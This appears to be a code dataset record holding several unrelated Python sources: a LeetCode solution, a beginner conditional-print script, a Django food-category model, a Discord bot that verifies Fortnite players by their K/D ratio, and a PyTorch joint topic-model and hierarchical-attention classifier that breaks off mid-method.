"step-5": "# https://leetcode.com/problems/how-many-numbers-are-smaller-than-the-current-number/\n\n# BruteForce\n\nclass BruteForceSolution:\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n \n \n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n \n return answer\n\nclass Solution:\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n \n sortedNums = sorted(nums)\n \n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n \n \n \n \n \n \nexample = BruteForceSolution()\nexampleTwo = Solution()\n\n\nprint(example.smallerNumbersThanCurrent([8,1,2,2,3]))\n\nprint(exampleTwo.smallerNumbersThanCurrent([8,1,2,2,3]))\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
def drive(carspeed):
if carspeed>200:
print("very fast")
elif carspeed>100:
print("toofast")
elif carspeed>70 and carspeed<80:
print("optimal speed")
else:
print("below speed limit")
drive(234)
drive(34)
drive(134)
# drive() prints its message and returns None, so wrapping the call in print() would also print "None"
def compare(a):
if a>11:
print("big")
elif a==10:
print("reallybig")
compare(10)
|
normal
|
{
"blob_id": "de3eaa5823fb396050527c148273c30bed6ce8ca",
"index": 2644,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef compare(a):\n if a > 11:\n print('big')\n elif a == 10:\n print('reallybig')\n\n\n<mask token>\n",
"step-3": "def drive(carspeed):\n if carspeed > 200:\n print('very fast')\n elif carspeed > 100:\n print('toofast')\n elif carspeed > 70 and carspeed < 80:\n print('optimal speed')\n else:\n print('below speed limit')\n\n\n<mask token>\n\n\ndef compare(a):\n if a > 11:\n print('big')\n elif a == 10:\n print('reallybig')\n\n\n<mask token>\n",
"step-4": "def drive(carspeed):\n if carspeed > 200:\n print('very fast')\n elif carspeed > 100:\n print('toofast')\n elif carspeed > 70 and carspeed < 80:\n print('optimal speed')\n else:\n print('below speed limit')\n\n\nprint(drive(234))\nprint(drive(34))\ndrive(134)\n\n\ndef compare(a):\n if a > 11:\n print('big')\n elif a == 10:\n print('reallybig')\n\n\ncompare(10)\n",
"step-5": "\ndef drive(carspeed):\n\tif carspeed>200:\n\t\tprint(\"very fast\")\n\telif carspeed>100:\n\t\tprint(\"toofast\")\n\telif carspeed>70 and carspeed<80:\n\t\tprint(\"optimal speed\")\n\telse:\n\t\tprint(\"below speed limit\")\nprint(drive(234))\nprint(drive(34))\ndrive(134)\n#how none will be removed?\ndef compare(a):\n\tif a>11:\n\t\tprint(\"big\")\n\telif a==10:\n\t\tprint(\"reallybig\")\ncompare(10)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import discord
import requests
import math
from keys import GITHUB_DISCORD_TOKEN, GITHUB_FORTNITE_API_KEY
client = discord.Client()
# Constant
DISCORD_TOKEN = GITHUB_DISCORD_TOKEN
FORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY
LIST = ['Verified']
VERIFIED = 4
# Return the current season squad K/D of the fortnite player
def get_ratio(username):
try:
print(username)
link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username
response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY})
if response.status_code == 200:
collection = response.json()
            if 'error' in collection:
                print("Invalid username")
                return "-1"
            else:
                ratio = collection['stats']['curr_p9']['kd']['value']
                return ratio
else:
print("Error parsing data.")
return "-2"
except KeyError:
print("Error finding data. KeyError was returned.")
return "-3"
@client.event
async def on_message(message):
# we do not want the bot to reply to itself
if message.author == client.user:
return
# The command !patch return a link with the lastest patch note
if message.content.startswith('!patch'):
await message.channel.send('Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/')
# The command !help explains the one function
if message.content.startswith('!help'):
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify Bot Help", icon_url="")
embed.add_field(name="Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify", value="You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\'t be able to verify you.", inline=False)
await message.channel.send(embed=embed)
# The command !verify return attribute a rank according to the K/D of the user
if message.content.startswith("!verify"):
for list in LIST:
roles = discord.utils.get(message.guild.roles, name=list)
username = '{0.author.display_name}'.format(message)
ratio = float(get_ratio(username))
msgRatio = str(ratio)
msgVerified = str(VERIFIED)
print(ratio)
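        # sentinel values from get_ratio: -1 player not found, -2 tracker/API error, -3 no current-season squad stats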
if ratio == -1.0:
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name="Fortnite player **" + message.author.display_name + "** not found.", value="\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.", inline=False)
await message.channel.send(embed=embed)
elif ratio == -2.0:
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name="Data not found.", value="Fortnite Tracker is down. Please try again shortly.", inline=False)
await message.channel.send(embed=embed)
elif ratio == -3.0:
embed = discord.Embed(colour=discord.Colour(0x8e2626), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name="No stats found for squad mode in the current season.", value="Play some games and try again.", inline=False)
await message.channel.send(embed=embed)
elif ratio > 0 and ratio < VERIFIED:
print("🚫")
print("-")
embed = discord.Embed(colour=discord.Colour(0x45278e), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name=message.author.display_name + " does not have over a " + msgVerified + " K/D.", value="Current season squads K/D: **" + msgRatio + "**", inline=False)
await message.channel.send(embed=embed)
elif ratio >= VERIFIED:
print("✅")
print("-")
role = discord.utils.get(message.guild.roles, name=LIST[0])
embed = discord.Embed(colour=discord.Colour(0x45278e), url="https://github.com/af1/kdFortniteDiscordBot",)
embed.set_author(name="Verify " + message.author.display_name, icon_url=message.author.avatar_url)
embed.add_field(name=message.author.display_name + " has over a " + msgVerified + " K/D. Verified!", value="Current season squads K/D: **" + msgRatio + "**", inline=False)
user=message.author
await message.channel.send(embed=embed)
await user.add_roles(role)
@client.event
async def on_ready():
print("-")
print("Logged in as: " + client.user.name)
print("With Client User ID: " + str(client.user.id))
print("Verified set to: " + str(VERIFIED))
print("-")
client.run(DISCORD_TOKEN)
|
normal
|
{
"blob_id": "6c6a49dfced680fe034cbbc2fa28d57d2aa1273e",
"index": 8973,
"step-1": "<mask token>\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('!patch'):\n await message.channel.send(\n 'Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/'\n )\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify Bot Help', icon_url='')\n embed.add_field(name=\n 'Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify'\n , value=\n 'You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.'\n , inline=False)\n await message.channel.send(embed=embed)\n if message.content.startswith('!verify'):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Fortnite player **' + message.author.\n display_name + '** not found.', value=\n \"\"\"\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\"\"\"\n , inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Data not found.', value=\n 'Fortnite Tracker is down. 
Please try again shortly.',\n inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=\n 'No stats found for squad mode in the current season.',\n value='Play some games and try again.', inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print('🚫')\n print('-')\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' does not have over a ' + msgVerified + ' K/D.', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print('✅')\n print('-')\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' has over a ' + msgVerified + ' K/D. Verified!', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n user = message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role)\n\n\[email protected]\nasync def on_ready():\n print('-')\n print('Logged in as: ' + client.user.name)\n print('With Client User ID: ' + str(client.user.id))\n print('Verified set to: ' + str(VERIFIED))\n print('-')\n\n\nclient.run(DISCORD_TOKEN)\n",
"step-3": "<mask token>\nclient = discord.Client()\nDISCORD_TOKEN = GITHUB_DISCORD_TOKEN\nFORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY\nLIST = ['Verified']\nVERIFIED = 4\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('!patch'):\n await message.channel.send(\n 'Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/'\n )\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify Bot Help', icon_url='')\n embed.add_field(name=\n 'Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify'\n , value=\n 'You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.'\n , inline=False)\n await message.channel.send(embed=embed)\n if message.content.startswith('!verify'):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Fortnite player **' + message.author.\n display_name + '** not found.', value=\n \"\"\"\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\"\"\"\n , inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Data not found.', value=\n 'Fortnite Tracker is down. 
Please try again shortly.',\n inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=\n 'No stats found for squad mode in the current season.',\n value='Play some games and try again.', inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print('🚫')\n print('-')\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' does not have over a ' + msgVerified + ' K/D.', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print('✅')\n print('-')\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' has over a ' + msgVerified + ' K/D. Verified!', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n user = message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role)\n\n\[email protected]\nasync def on_ready():\n print('-')\n print('Logged in as: ' + client.user.name)\n print('With Client User ID: ' + str(client.user.id))\n print('Verified set to: ' + str(VERIFIED))\n print('-')\n\n\nclient.run(DISCORD_TOKEN)\n",
"step-4": "import discord\nimport requests\nimport math\nfrom keys import GITHUB_DISCORD_TOKEN, GITHUB_FORTNITE_API_KEY\nclient = discord.Client()\nDISCORD_TOKEN = GITHUB_DISCORD_TOKEN\nFORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY\nLIST = ['Verified']\nVERIFIED = 4\n\n\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY}\n )\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return '-1'\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print('Invalid username')\n return '-1'\n else:\n print('Error parsing data.')\n return '-2'\n except KeyError:\n print('Error finding data. KeyError was returned.')\n return '-3'\n\n\[email protected]\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('!patch'):\n await message.channel.send(\n 'Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/'\n )\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify Bot Help', icon_url='')\n embed.add_field(name=\n 'Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify'\n , value=\n 'You can change your nickname by typing \"/nick *YourEpicIGN*\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.'\n , inline=False)\n await message.channel.send(embed=embed)\n if message.content.startswith('!verify'):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Fortnite player **' + message.author.\n display_name + '** not found.', value=\n \"\"\"\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\"\"\"\n , inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name='Data not found.', value=\n 'Fortnite Tracker is down. 
Please try again shortly.',\n inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(9315878), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=\n 'No stats found for squad mode in the current season.',\n value='Play some games and try again.', inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print('🚫')\n print('-')\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' does not have over a ' + msgVerified + ' K/D.', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print('✅')\n print('-')\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(4532110), url=\n 'https://github.com/af1/kdFortniteDiscordBot')\n embed.set_author(name='Verify ' + message.author.display_name,\n icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name +\n ' has over a ' + msgVerified + ' K/D. Verified!', value=\n 'Current season squads K/D: **' + msgRatio + '**', inline=False\n )\n user = message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role)\n\n\[email protected]\nasync def on_ready():\n print('-')\n print('Logged in as: ' + client.user.name)\n print('With Client User ID: ' + str(client.user.id))\n print('Verified set to: ' + str(VERIFIED))\n print('-')\n\n\nclient.run(DISCORD_TOKEN)\n",
"step-5": "import discord\nimport requests\nimport math\nfrom keys import GITHUB_DISCORD_TOKEN, GITHUB_FORTNITE_API_KEY\n\nclient = discord.Client()\n\n# Constant\nDISCORD_TOKEN = GITHUB_DISCORD_TOKEN\nFORTNITE_API_KEY = GITHUB_FORTNITE_API_KEY\n\nLIST = ['Verified']\nVERIFIED = 4\n\n# Return the current season squad K/D of the fortnite player\ndef get_ratio(username):\n try:\n print(username)\n link = 'https://api.fortnitetracker.com/v1/profile/pc/' + username\n response = requests.get(link, headers={'TRN-Api-Key': FORTNITE_API_KEY})\n if response.status_code == 200:\n collection = response.json()\n if 'error' in collection:\n return \"-1\"\n else:\n ratio = collection['stats']['curr_p9']['kd']['value']\n return ratio\n print(\"Invalid username\")\n return \"-1\"\n else:\n print(\"Error parsing data.\")\n return \"-2\"\n except KeyError:\n print(\"Error finding data. KeyError was returned.\")\n return \"-3\"\n\[email protected]\nasync def on_message(message):\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n # The command !patch return a link with the lastest patch note\n if message.content.startswith('!patch'):\n await message.channel.send('Latest patch notes: https://www.epicgames.com/fortnite/en-US/patch-notes/')\n # The command !help explains the one function\n if message.content.startswith('!help'):\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify Bot Help\", icon_url=\"\")\n embed.add_field(name=\"Set your Discord nickname to be exacly the same as your Epic Games player name. Then type: !verify\", value=\"You can change your nickname by typing \\\"/nick *YourEpicIGN*\\\". The bot looks at your squad K/D for the current season, so if you have no games played yet, the bot won\\'t be able to verify you.\", inline=False)\n await message.channel.send(embed=embed)\n # The command !verify return attribute a rank according to the K/D of the user\n if message.content.startswith(\"!verify\"):\n for list in LIST:\n roles = discord.utils.get(message.guild.roles, name=list)\n username = '{0.author.display_name}'.format(message)\n ratio = float(get_ratio(username))\n msgRatio = str(ratio)\n msgVerified = str(VERIFIED)\n print(ratio)\n if ratio == -1.0:\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=\"Fortnite player **\" + message.author.display_name + \"** not found.\", value=\"\\nYour Discord nickname and IGN must be exactly the same. Change your Discord nickname to your IGN and try again.\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -2.0:\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=\"Data not found.\", value=\"Fortnite Tracker is down. 
Please try again shortly.\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio == -3.0:\n embed = discord.Embed(colour=discord.Colour(0x8e2626), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=\"No stats found for squad mode in the current season.\", value=\"Play some games and try again.\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio > 0 and ratio < VERIFIED:\n print(\"🚫\")\n print(\"-\")\n embed = discord.Embed(colour=discord.Colour(0x45278e), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name + \" does not have over a \" + msgVerified + \" K/D.\", value=\"Current season squads K/D: **\" + msgRatio + \"**\", inline=False)\n await message.channel.send(embed=embed)\n elif ratio >= VERIFIED:\n print(\"✅\")\n print(\"-\")\n role = discord.utils.get(message.guild.roles, name=LIST[0])\n embed = discord.Embed(colour=discord.Colour(0x45278e), url=\"https://github.com/af1/kdFortniteDiscordBot\",)\n embed.set_author(name=\"Verify \" + message.author.display_name, icon_url=message.author.avatar_url)\n embed.add_field(name=message.author.display_name + \" has over a \" + msgVerified + \" K/D. Verified!\", value=\"Current season squads K/D: **\" + msgRatio + \"**\", inline=False)\n user=message.author\n await message.channel.send(embed=embed)\n await user.add_roles(role) \n \[email protected]\nasync def on_ready():\n print(\"-\")\n print(\"Logged in as: \" + client.user.name)\n print(\"With Client User ID: \" + str(client.user.id))\n print(\"Verified set to: \" + str(VERIFIED))\n print(\"-\")\n\nclient.run(DISCORD_TOKEN)\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.db import models
class FoodCategory(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=200, default='')
class Meta:
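        # store rows in the existing 'kitchenrock_category' table instead of the default '<app_label>_foodcategory' name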
db_table = 'kitchenrock_category'
def __str__(self):
return self.name
|
normal
|
{
"blob_id": "9bb1fc4df80d183c70d70653faa3428964b93a94",
"index": 9494,
"step-1": "<mask token>\n\n\nclass FoodCategory(models.Model):\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass FoodCategory(models.Model):\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n\n def __str__(self):\n return self.name\n",
"step-3": "<mask token>\n\n\nclass FoodCategory(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=200, default='')\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n\n def __str__(self):\n return self.name\n",
"step-4": "from django.db import models\n\n\nclass FoodCategory(models.Model):\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=200, default='')\n\n\n class Meta:\n db_table = 'kitchenrock_category'\n\n def __str__(self):\n return self.name\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
import torch
from torch import nn
import torch.nn.functional as F
class JointModel(nn.Module):
def __init__(self, d_v, d_e, d_t, encoder_layers, generator_layers,encoder_shortcut, generator_shortcut, generator_transform,
num_word, emb_size, word_rnn_size, word_rnn_num_layer, word_rnn_dropout, word_rnn_bidirectional,word_attention_size,
context_rnn_size, context_rnn_num_layer, context_rnn_dropout, context_rnn_bidirectional,context_attention_size, mlp_size,
num_label, pretrained_embedding):
super(JointModel, self).__init__()
##NGTM:
self.d_v = d_v # vocabulary size
self.d_e = d_e # dimensionality of encoder
self.d_t = d_t # number of topics
self.encoder_layers = encoder_layers
self.generator_layers = generator_layers
self.generator_transform = generator_transform # transform to apply after the generator
self.encoder_shortcut = encoder_shortcut
self.generator_shortcut = generator_shortcut
self.en1_fc = nn.Linear(self.d_v, self.d_e)
self.en2_fc = nn.Linear(self.d_e, self.d_e)
self.en_drop = nn.Dropout(0.2)
self.mean_fc = nn.Linear(self.d_e, self.d_t)
# self.mean_bn = nn.BatchNorm1d(self.d_t)
self.logvar_fc = nn.Linear(self.d_e, self.d_t)
# self.logvar_bn = nn.BatchNorm1d(self.d_t)
self.generator1 = nn.Linear(self.d_t, self.d_t)
self.generator2 = nn.Linear(self.d_t, self.d_t)
self.generator3 = nn.Linear(self.d_t, self.d_t)
self.generator4 = nn.Linear(self.d_t, self.d_t)
self.r_drop = nn.Dropout(0.2)
self.de = nn.Linear(self.d_t, self.d_v)
# self.de_bn = nn.BatchNorm1d(self.d_v)
##HAN:
self.emb_size = emb_size
self.word_rnn_size = word_rnn_size
self.word_rnn_num_layer = word_rnn_num_layer
self.word_rnn_bidirectional = word_rnn_bidirectional
self.context_rnn_size = context_rnn_size
self.context_rnn_num_layer = context_rnn_num_layer
self.context_rnn_bidirectional = context_rnn_bidirectional
self.num_label = num_label
self.embedding = nn.Embedding(num_word, emb_size)
self.word_rnn = nn.GRU(input_size=emb_size, hidden_size=word_rnn_size, dropout=word_rnn_dropout,
num_layers=word_rnn_num_layer, bidirectional=word_rnn_bidirectional)
word_rnn_output_size = word_rnn_size * 2 if word_rnn_bidirectional else word_rnn_size
self.word_conv_attention_linear = nn.Linear(word_rnn_output_size, self.d_t, bias=False)
self.word_conv_attention_linear2 = nn.Linear(self.d_t, 1, bias=False)
self.context_rnn = nn.GRU(input_size=word_rnn_output_size, hidden_size=context_rnn_size,dropout=context_rnn_dropout,
num_layers=context_rnn_num_layer, bidirectional=context_rnn_bidirectional)
context_rnn_output_size = context_rnn_size * 2 if context_rnn_bidirectional else context_rnn_size
self.context_conv_attention_linear = nn.Linear(context_rnn_output_size, 1, bias=False)
self.classifier = nn.Sequential(nn.Linear(context_rnn_output_size, mlp_size),
nn.LeakyReLU(),
nn.Linear(mlp_size, num_label),
nn.Tanh())
if pretrained_embedding is not None:
self.embedding.weight.data = self.embedding.weight.data.new(pretrained_embedding)
def encoder(self, x):
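        # 1- or 2-layer ReLU MLP over the bag-of-words input, then linear heads for the Gaussian mean and log-variance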
if self.encoder_layers == 1:
pi = F.relu(self.en1_fc(x))
if self.encoder_shortcut:
pi = self.en_drop(pi)
else:
pi = F.relu(self.en1_fc(x))
pi = F.relu(self.en2_fc(pi))
if self.encoder_shortcut:
pi = self.en_drop(pi)
# mean = self.mean_bn(self.mean_fc(pi))
# logvar = self.logvar_bn(self.logvar_fc(pi))
mean = self.mean_fc(pi)
logvar = self.logvar_fc(pi)
return mean, logvar
def sampler(self, mean, logvar, cuda):
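        # reparameterization trick: h = mean + exp(logvar) * eps (logvar is used directly as the log of the scale)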
eps = torch.randn(mean.size()).cuda(cuda)
sigma = torch.exp(logvar)
h = sigma.mul(eps).add_(mean)
return h
def generator(self, h):
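        # 0-4 stacked linear layers with an optional tanh residual shortcut, then the configured output transform and dropout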
if self.generator_layers == 0:
r = h
elif self.generator_layers == 1:
temp = self.generator1(h)
if self.generator_shortcut:
r = F.tanh(temp) + h
else:
r = temp
elif self.generator_layers == 2:
temp = F.tanh(self.generator1(h))
temp2 = self.generator2(temp)
if self.generator_shortcut:
r = F.tanh(temp2) + h
else:
r = temp2
else:
temp = F.tanh(self.generator1(h))
temp2 = F.tanh(self.generator2(temp))
temp3 = F.tanh(self.generator3(temp2))
temp4 = self.generator4(temp3)
if self.generator_shortcut:
r = F.tanh(temp4) + h
else:
r = temp4
if self.generator_transform == 'tanh':
return self.r_drop(F.tanh(r))
elif self.generator_transform == 'softmax':
return self.r_drop(F.softmax(r)[0])
elif self.generator_transform == 'relu':
return self.r_drop(F.relu(r))
else:
return self.r_drop(r)
def decoder(self, r):
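        # project the topic representation back to vocabulary size; softmax gives the reconstruction p(x|h)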
# p_x_given_h = F.softmax(self.de_bn(self.de(r)))
